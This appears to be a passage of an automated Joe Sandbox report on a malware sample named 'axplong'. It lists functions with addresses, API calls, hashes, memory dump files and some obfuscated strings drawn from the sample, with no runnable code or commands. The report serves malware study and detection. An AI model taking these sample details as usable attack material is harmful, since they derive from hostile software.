Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: 6f9f86c57d1240e160294a17c06028d2c15edb2b61a95791d3abee5bac848bf4
Instruction ID: a9b87c387d2607d8102bcab685a9d9950dc7bc935a1f356b96cb7c053dc6ecc6
Opcode Fuzzy Hash: 6f9f86c57d1240e160294a17c06028d2c15edb2b61a95791d3abee5bac848bf4
Instruction Fuzzy Hash: 6711ECB290020DBADB10DED5D944EDFBBBCAB48314F509266E516E7184EB30EB48CB61

Function 0053D6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0053A5ED,?,005374AE,?,00000000,?), ref: 0053D731

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bcac9d4edac13e5b346e692caa6a32449cd573a534177a23ab16fb65c4c0018c
Instruction ID: 5bc0b736eaf1cb5ddaf4563fb4095f8ce77bb6c30edb2bdac401f6d6845335e2
Opcode Fuzzy Hash: bcac9d4edac13e5b346e692caa6a32449cd573a534177a23ab16fb65c4c0018c
Instruction Fuzzy Hash: 3EF0E931A09225669F222A657C05BAB7FB9FF817B0F184511FC04DA181DA60EC0042F0

Function 00516AE0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 00516B65

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 752c03ea421ea8f1bf85f8b0784134948e98f61047b0046f9f7bcbd77f169fd8
Instruction ID: 49f0d4dddb2a610f09b548127b736402b81947cf16277c1a29047ca39beb9b02
Opcode Fuzzy Hash: 752c03ea421ea8f1bf85f8b0784134948e98f61047b0046f9f7bcbd77f169fd8
Instruction Fuzzy Hash: 47F0D171E00A08BBC700BBAC9C0EB5E7F74FB47760F800348E811672E1EA745A048BD2

Function 04F00CC4 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3327380376.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f00000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c72e7de4bbf51285b8ab1934b2c54f4a2718586e0cb87b7204270088f2dd6d55
Instruction ID: 5e49db80a39617d0325d7619cbac62926693a14fedc703b925a4600199d7d6b9
Opcode Fuzzy Hash: c72e7de4bbf51285b8ab1934b2c54f4a2718586e0cb87b7204270088f2dd6d55
Instruction Fuzzy Hash: 8F118C7B64D1426EC70299A46A00BF67F6FBBD7330324C066F4429B482F6919A0772E0

Function 04F00C0A Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3327380376.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f00000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77f7f75da3470c9ede0f052eedaa2475eda9da7ec5c6576c37e3eaf5cc88b918
Instruction ID: 6078fb1d7a598310da59ac1894a875877133267c27ce7c0a3a63674ddb301118
Opcode Fuzzy Hash: 77f7f75da3470c9ede0f052eedaa2475eda9da7ec5c6576c37e3eaf5cc88b918
Instruction Fuzzy Hash: B201CEB330D115AFD3036520AA44BB97D5ABBC3330725C03AF047CB582FB54A407B122

Function 04F00BF6 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3327380376.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f00000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be0aadcd81347b6f39af53ab312ed13c49d3caf6581bc5745e6ff1f1e03e24da
Instruction ID: fe118910e2fd2045ad6987f471786cb335344c4b24fb51411da6bbbda32e343c
Opcode Fuzzy Hash: be0aadcd81347b6f39af53ab312ed13c49d3caf6581bc5745e6ff1f1e03e24da
Instruction Fuzzy Hash: 0B0126BB34E115BE83031551BB44BFA7A6BA7D7330320C026B40BD7682FEA466477262

Function 04F00C51 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3327380376.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f00000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1132e23723745f59de2c00acd0687f2bf060b8ba368dd185ea9441c8697272ae
Instruction ID: 10f035e4e43d36bad21846d786e34b06d25743b5d665faf0920411f5c3ffac64
Opcode Fuzzy Hash: 1132e23723745f59de2c00acd0687f2bf060b8ba368dd185ea9441c8697272ae
Instruction Fuzzy Hash: E6F0E2BB24E411BE93025960BB04BFA796FB7D6330720C426F847C7581FFA465477162

Function 04F00C6D Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3327380376.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f00000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19fa1a69b601a1fd73cc6370a0e552c5c56d65cdf2ac9c025915d695f03bd1b6
Instruction ID: 394d98291a66332706f02b305a87ab5595b041ce426782a768fd90584831d209
Opcode Fuzzy Hash: 19fa1a69b601a1fd73cc6370a0e552c5c56d65cdf2ac9c025915d695f03bd1b6
Instruction Fuzzy Hash: B0F0E9B734D505EF83069E54F601BB67AABBBD9320310C429F407C7151EE706513B165

Function 04F00C5E Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3327380376.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f00000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c4dd96c183ea6974a37f91f836cf4f3b80a1e16d82ab237be1bab78539770d2
Instruction ID: f4c86d75a97b61bb6b7b07ce769884b76e90902810e1aaedc3239c6fe53ab17a
Opcode Fuzzy Hash: 8c4dd96c183ea6974a37f91f836cf4f3b80a1e16d82ab237be1bab78539770d2
Instruction Fuzzy Hash: 7DF0A7B724D515BE93029954BA04FB6796FB7D5330710C425B80BC7541FF606547B161

Function 04F00C8C Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3327380376.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f00000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40e7726b364972192ed7617a98f6731426144f1e9a39cd689fd6e7ded59a2680
Instruction ID: 7f93928a11ab249f7d2ccab4d337faa0e98ea038bb04f847af5fa6eaf40410a3
Opcode Fuzzy Hash: 40e7726b364972192ed7617a98f6731426144f1e9a39cd689fd6e7ded59a2680
Instruction Fuzzy Hash: 4AE02BB324D104BF47026AE4E600BB67E6F7799320700C125B807D7481FE612502B151

Function 04F00CA2 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3327380376.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f00000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0aa25e6e91f444fe3311efba704455f99597e5838aa24be585b6e57ab0d88cf0
Instruction ID: 2d0f182786498329a2ccb571c0f51aa22035fed8bbe83b5e64bd228f0700564d
Opcode Fuzzy Hash: 0aa25e6e91f444fe3311efba704455f99597e5838aa24be585b6e57ab0d88cf0
Instruction Fuzzy Hash: 68E09B73349019BEDB436E54E9006F67E2BB785720700C115F40687584EF716106B251

Non-executed Functions

Function 0050E440 Relevance: 14.6, Strings: 11, Instructions: 878COMMON

Download Yara Rule

Strings

246122658369, xrefs: 0050F647, 0050F924, 005104F7
d4V, xrefs: 0050F6D5
fed3aa, xrefs: 0050FA9E
MT==, xrefs: 0050E4A5
WGt=, xrefs: 0050F62D, 0050F90A
UD==, xrefs: 0050EA1F, 0050EC66
GqKudSO2, xrefs: 0050E47F
111, xrefs: 0050F6B0
WWp=, xrefs: 005104DA
MJB+, xrefs: 0050E734
#, xrefs: 00510534

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$d4V$fed3aa
API String ID: 0-2274789073
Opcode ID: 28902b3848fc4968e2f3468de66dbbe18d754f4711eccc3997a468f2139060fd
Instruction ID: b178425726d83e1b9a71338d732b61805a84e5db57127410a4879ee04a1f1200
Opcode Fuzzy Hash: 28902b3848fc4968e2f3468de66dbbe18d754f4711eccc3997a468f2139060fd
Instruction Fuzzy Hash: E372C570904248EBEF14EF68C94A7DE7FB6BB45304F608598E805673C2D7759A88CBD2

Function 00543068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 005431E3

Strings

1#INF, xrefs: 0054439E
1#SNAN, xrefs: 0054437A
1#IND, xrefs: 00544373
1#QNAN, xrefs: 00544381

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: c4c63adf420c7c2cd54dcb2ce0b9f79390bc6725da5251981805aba28e717e9c
Instruction ID: bfdd4fe961b01e3f7f6df0cb012bc41310a6f7e2b6a411f7e7373f5a2429892d
Opcode Fuzzy Hash: c4c63adf420c7c2cd54dcb2ce0b9f79390bc6725da5251981805aba28e717e9c
Instruction Fuzzy Hash: B3C24C71E086298FDB24CE28DD447E9BBB5FB88309F1445EAD84DE7250E774AE858F40

Function 00542BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: 8eeb8b2e360b9682475a1c01b0e2c3aaa91d9d791b5206e88ea0eb9598dda164
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: 8BF14F71E002299FDF14CFA9C8806EDBBB5FF88318F558269E819A7345D731AE45CB90

Function 0051D312 Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0050247E

Strings

'kQd+V, xrefs: 0051DCEC
'kQd+V, xrefs: 0051D324, 0051DCA4

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: 'kQd+V$'kQd+V
API String ID: 2659868963-1841753910
Opcode ID: c62617b7fb22bec55b79495b31b370219253e0c585de0884eab6e0064a63e2b8
Instruction ID: a06685a7e3943cab60054c9b5a514b072fb1e5464042fccae856ed6badf6c4f1
Opcode Fuzzy Hash: c62617b7fb22bec55b79495b31b370219253e0c585de0884eab6e0064a63e2b8
Instruction Fuzzy Hash: 5251D3B2900605CFEB15CF58E8957EEBBF4FB58310F24866AD405EB250E3749984CFA0

Function 0051CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,0051CE82,?,?,?,?,0051CEB7,?,?,?,?,?,?,0051C42D,?,00000001), ref: 0051CB33

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: 920779bd532532a48f00e10f8347e461fb7f6acace8c0b236c9dd1c016e617a5
Instruction ID: 41f7c8b25c74e7a2d86973a923b5e6c75c2f6b06fcfdbe3f7b9e9f2d870ab94a
Opcode Fuzzy Hash: 920779bd532532a48f00e10f8347e461fb7f6acace8c0b236c9dd1c016e617a5
Instruction Fuzzy Hash: A7D02232586138A3CA012B94FC04CEEBF08AB00B207802211E808A3520CE927C80ABD1

Function 00537D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00537EFF

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: abf2d560c062e7885f9cab338b5a959992c5f36c1d463f629ed9166e144c114d
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: 665166F0E0C64E56DF3D8A3888997BE6F9EBF9D300F140C59E442D7682CA51DE48A752

Function 00504CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8c79f06d6a230fe63ac4eba84414d88f282312a5c8368997329064d95690f7d
Instruction ID: 8bd577d86b642710cf9248c28151ca92fc1c2b8177636f001b24b3dcbd1eb80b
Opcode Fuzzy Hash: b8c79f06d6a230fe63ac4eba84414d88f282312a5c8368997329064d95690f7d
Instruction Fuzzy Hash: B72270B3F515144BDB0CCA5DDCA27ECB2E3AFE8214B0E813DE40AE3345EA79D9159644

Function 00546F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000007E1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000080D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000814000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.0000000000823000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321220392.0000000000824000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321348595.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3321373951.00000000009CB000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_500000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50d7ec8c82d266f9f0f3f28b7de0794193066c6fde995bfe2c2906176b6d255f
Instruction ID: 186675ce66b11b24ed8134061cf783023b4ddc7d7a5f7021da383aa018d5ceb8
Opcode Fuzzy Hash: 50d7ec8c82d266f9f0f3f28b7de0794193066c6fde995bfe2c2906176b6d255f
Instruction Fuzzy Hash: B4B14B71214609DFD719CF28C48ABA57FA0FF49368F258658E899CF2A1C335E992CF40

Function 00504AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3319619171.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Offset: 00500000, based on PE: true

Associated: 00000004.00000002.3319588700.0000000000500000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319619171.0000000000562000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319691281.0000000000569000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.000000000056B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
